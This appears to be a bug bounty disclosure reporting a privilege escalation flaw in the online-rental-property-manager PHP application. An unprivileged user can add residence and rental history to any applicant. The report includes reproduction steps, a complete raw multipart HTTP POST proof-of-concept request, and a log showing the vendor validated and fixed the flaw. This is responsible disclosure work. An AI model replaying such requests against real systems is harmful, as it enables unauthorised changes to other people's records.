Improper Privilege Management in bigprof-software/online-rental-property-manager

Valid

Reported on

Jul 3rd 2021

💥 BUG

privilege escalation bug to add residence_and_rental to a applicant .

💥 IMPACT

unprivileged user can add residence_and_rental to a applicant

💥 STEP TO REPRODUCE

1. From admin account goto http://localhost/online-rental/app/admin/pageViewMembers.php and add new user called user-B .
Now revoke all acccess from Applicants and tenants module for user-B .
So, user-B cant view/edit/create/delete any applicant.
2. Now goto admin account and add a new applicant .Lets asume the applicant id is 1\

3. Now goto user-B account and sent bellow request to add residence_and_rental to above applicant.\

POST /online-rental/app/residence_and_rental_history_view.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------359396311723915903184220116124
Content-Length: 3337
Origin: http://localhost
Connection: close
Referer: http://localhost/online-rental/app/residence_and_rental_history_view.php?filterer_tenant=1&addNew_x=1&Embedded=1
Cookie: rental_property_manager=8qh2ouu3163e1bjr6f25i45c51; 
Upgrade-Insecure-Requests: 1
Account: test2

-----------------------------359396311723915903184220116124
Content-Disposition: form-data; name="Embedded"

1
-----------------------------359396311723915903184220116124
Content-Disposition: form-data; name="csrf_token"

a21d69a86030e40629ee0be7c5920f08
-----------------------------359396311723915903184220116124
Content-Disposition: form-data; name="filterer_tenant"

1
-----------------------------359396311723915903184220116124
Content-Disposition: form-data; name="current_view"

DV
-----------------------------359396311723915903184220116124
Content-Disposition: form-data; name="SortField"


-----------------------------359396311723915903184220116124
Content-Disposition: form-data; name="SelectedID"


-----------------------------359396311723915903184220116124
Content-Disposition: form-data; name="SelectedField"


-----------------------------359396311723915903184220116124
Content-Disposition: form-data; name="SortDirection"


-----------------------------359396311723915903184220116124
Content-Disposition: form-data; name="FirstRecord"

1
-----------------------------359396311723915903184220116124
Content-Disposition: form-data; name="NoDV"


-----------------------------359396311723915903184220116124
Content-Disposition: form-data; name="PrintDV"


-----------------------------359396311723915903184220116124
Content-Disposition: form-data; name="DisplayRecords"

all
-----------------------------359396311723915903184220116124
Content-Disposition: form-data; name="tenant"

1
-----------------------------359396311723915903184220116124
Content-Disposition: form-data; name="address"

by_user2
-----------------------------359396311723915903184220116124
Content-Disposition: form-data; name="landlord_or_manager_name"


-----------------------------359396311723915903184220116124
Content-Disposition: form-data; name="landlord_or_manager_phone"


-----------------------------359396311723915903184220116124
Content-Disposition: form-data; name="monthly_rent"


-----------------------------359396311723915903184220116124
Content-Disposition: form-data; name="duration_of_residency_fromMonth"


-----------------------------359396311723915903184220116124
Content-Disposition: form-data; name="duration_of_residency_fromDay"


-----------------------------359396311723915903184220116124
Content-Disposition: form-data; name="duration_of_residency_fromYear"


-----------------------------359396311723915903184220116124
Content-Disposition: form-data; name="toMonth"


-----------------------------359396311723915903184220116124
Content-Disposition: form-data; name="toDay"


-----------------------------359396311723915903184220116124
Content-Disposition: form-data; name="toYear"


-----------------------------359396311723915903184220116124
Content-Disposition: form-data; name="reason_for_leaving"


-----------------------------359396311723915903184220116124
Content-Disposition: form-data; name="notes"

by_user<br>
-----------------------------359396311723915903184220116124
Content-Disposition: form-data; name="insert_x"

1
-----------------------------359396311723915903184220116124
Content-Disposition: form-data; name="SearchString"


-----------------------------359396311723915903184220116124--

Here in this request change applicant id value to above applicant id and a new residence_and_rental will be added to above applicant .
So, user-B dont have any access in applicant module but can add residence_and_rental to any applicant .

We have contacted a member of the bigprof-software/online-rental-property-manager team and are waiting to hear back 2 years ago
BigProf Software validated this vulnerability 2 years ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
BigProf Software marked this as fixed with commit 5d3fa4 2 years ago
BigProf Software has been awarded the fix bounty
This vulnerability will not receive a CVE
to join this conversation